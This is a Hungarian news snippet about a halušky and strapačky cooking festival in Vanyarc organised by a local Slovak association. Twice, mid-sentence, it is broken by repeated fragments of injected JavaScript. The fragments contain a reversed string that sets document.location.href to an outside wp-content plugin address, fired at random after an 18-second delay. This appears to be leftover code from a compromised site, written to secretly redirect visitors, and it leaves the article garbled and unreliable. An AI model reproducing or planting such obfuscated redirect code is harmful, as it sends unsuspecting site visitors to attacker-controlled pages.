Nedeliczki Teréz szervező, a Nógrád-Hevesi Szlovákok Egyesületének vezetője az MTI-nek szerdán elmondta: 2003-ban azzal a céllal indítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották el a fesztivált, hogy minél többen megismerjék a régió gasztronómiáját, folklórját, kézműveseit, a cserháti vidéket, és megmutassák a vanyarciak vendégszeretetét. Idén húsz csapat főzi majd a szlovák nemzeti ételnek számító, és hazánkban is szeretett haluskát vagy sztrapacskát. Mint Nedeliczki Teréz megjegyezte, a két étel valójában ugyanaz, alapanyaguk a reszelt krumpli, a liszt, a só és a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tojás, csak Szlovákiában a sztrapacskába káposzta, a haluskába pedig brindza, vagyis juhtúró kerül. A rendezvényen próbálják háttérbe szorítani a műanyagok használatát, és mint a szervező elmondta, ezt…
A cikk folytatódik: http://gasztrokalandok.co.hu/etteremajanlo/2018/09/10/haluskafesztivalt-es-fozoversenyt-rendeznek-vanyarcon.html
- Hirdetés -